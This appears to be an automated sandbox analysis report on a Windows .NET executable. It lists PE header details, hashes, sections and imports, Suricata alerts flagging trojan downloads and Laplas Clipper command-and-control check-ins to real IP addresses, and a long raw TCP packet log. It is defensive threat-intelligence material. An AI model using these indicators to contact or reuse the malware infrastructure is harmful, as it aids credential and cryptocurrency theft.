                                                                                                  SHA512:35d23d332c0389b3d3e7086613e60d73c158a7dd408bc4320ccb10aba8c2755ea99bf0d484cd257d53d42a6fe95a9bab0c606e7c580039aa5334767a4096662f
                                                                                                  SSDEEP:384:/LVHmcPXblyCKGK9dnORWsK7PPZzcuIYZKJHtZW39cDpbJO:/hHHPbICKJEW7PPeQKy6db
                                                                                                  TLSH:31921059A47BC406C063DE762CDD96B7CB59D8F2350C723B0298A32BBF817648D47AB4
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.................B..........^a... ........@.. ....................................@................................

                                                                                                  File Icon

                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x40615e
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x63BFDCB7 [Thu Jan 12 10:11:03 2023 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x61100x4b.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x56c.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000x41640x4200eccf20ea112bf438be683fa0cf166e8aFalse0.35102982954545453data4.256724512349862IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x80000x56c0x600ea3c12d2167505e92592d2bdc186595fFalse0.3984375data4.19455785120341IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xa0000xc0x2000445df288dec4d312cb0239a7b5a13d3False0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_VERSION0x80a00x234data0.46808510638297873
                                                                                                  RT_MANIFEST0x82d40x298XML 1.0 document, ASCII text0.46536144578313254

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-10-04T19:13:18.950746+02002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.449730185.166.143.49443TCP
                                                                                                  2024-10-04T19:13:20.612319+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449731185.166.143.49443TCP
                                                                                                  2024-10-04T19:13:22.132122+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449732185.166.143.49443TCP
                                                                                                  2024-10-04T19:13:59.781016+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.44973945.159.189.10580TCP
                                                                                                  2024-10-04T19:13:59.781016+02002039775ET MALWARE Laplas Clipper - Regex CnC Request1192.168.2.44973945.159.189.10580TCP
                                                                                                  2024-10-04T19:14:01.488048+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.44974045.159.189.10580TCP
                                                                                                  2024-10-04T19:14:01.488048+02002039776ET MALWARE Laplas Clipper - SetOnline CnC Checkin1192.168.2.44974045.159.189.10580TCP
                                                                                                  2024-10-04T19:14:57.437285+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.45000745.159.189.10580TCP
                                                                                                  2024-10-04T19:14:57.437285+02002039775ET MALWARE Laplas Clipper - Regex CnC Request1192.168.2.45000745.159.189.10580TCP
                                                                                                  2024-10-04T19:14:59.158697+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.45000845.159.189.10580TCP
                                                                                                  2024-10-04T19:14:59.158697+02002039776ET MALWARE Laplas Clipper - SetOnline CnC Checkin1192.168.2.45000845.159.189.10580TCP

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 4, 2024 19:13:17.789968014 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:17.789997101 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:17.790060043 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:17.800522089 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:17.800551891 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:18.553272963 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:18.553345919 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:18.557543993 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:18.557571888 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:18.558074951 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:18.569608927 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:18.611413956 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:18.950452089 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:18.950514078 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:18.950545073 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:18.950563908 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:18.950583935 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:18.950588942 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:18.950602055 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:18.950638056 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:18.950639963 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:18.950686932 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.033735991 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.033798933 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.033834934 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.033865929 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.033888102 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.033902884 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.037456989 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.037523031 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.037547112 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.037554026 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.037585974 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.037600040 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.119699955 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.119750023 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.119800091 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.119818926 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.119837999 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.119848013 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.119851112 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.119882107 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.119899988 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.120528936 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.120582104 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.120603085 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.120611906 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.120635986 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.120714903 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.121292114 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.121339083 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.121356964 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.121365070 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.121390104 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.176021099 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.205990076 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206012964 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206059933 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.206073046 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206101894 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.206115961 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.206516981 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206542969 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206607103 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.206615925 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.206679106 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.207271099 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.207290888 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.207324982 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.207331896 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.207359076 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.207376957 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.207767963 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.207787037 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.207839012 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.207849026 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208034992 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.208369017 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208388090 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208422899 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.208429098 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208473921 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.208479881 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208491087 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.208535910 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.219837904 CEST49730443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.219863892 CEST44349730185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.246108055 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.246155977 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.246251106 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.246627092 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.246643066 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.888947010 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:19.899128914 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:19.899157047 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.612261057 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.612282991 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.612302065 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.612329006 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.612350941 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.612365961 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.612396002 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.613857031 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.613882065 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.613920927 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.613926888 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.613955021 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.613970995 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.617541075 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.617559910 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.617628098 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.617645979 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.617667913 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.619852066 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.619877100 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.619913101 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.619927883 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.619949102 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.622330904 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.622348070 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.622399092 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.622415066 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.622428894 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.623868942 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.623891115 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.623933077 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.623945951 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.623961926 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.676014900 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.676347971 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.676376104 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.676415920 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.676428080 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.676444054 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.676469088 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.676996946 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677025080 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677047014 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.677057028 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677078962 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.677098036 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.677620888 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677644014 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677691936 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.677705050 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.677741051 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.678232908 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.678256989 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.678287983 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.678297997 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.678322077 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.678355932 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.679605007 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.679625034 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.679678917 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.679689884 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.679719925 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.679729939 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.682084084 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.682102919 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.682157040 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.682164907 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.682183981 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.682216883 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.683940887 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.683959961 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.684000969 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.684007883 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.684040070 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.684048891 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.763582945 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.763611078 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.763662100 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.763693094 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.763711929 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.763740063 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.763997078 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764015913 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764058113 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.764064074 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764077902 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.764117956 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.764580965 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764609098 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764668941 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.764674902 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.764709949 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.764729977 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.765284061 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.765305042 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.765351057 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.765358925 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.765373945 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.765399933 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.765983105 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.766009092 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.766067028 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.766074896 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.766108036 CEST44349731185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.766120911 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.766151905 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.768444061 CEST49731443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.844315052 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.844352007 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:20.844418049 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.844629049 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:20.844640970 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:21.585411072 CEST44349732185.166.143.49192.168.2.4
                                                                                                  Oct 4, 2024 19:13:21.586524963 CEST49732443192.168.2.4185.166.143.49
                                                                                                  Oct 4, 2024 19:13:21.586555958 CEST44349732185.166.143.49192.168.2.4
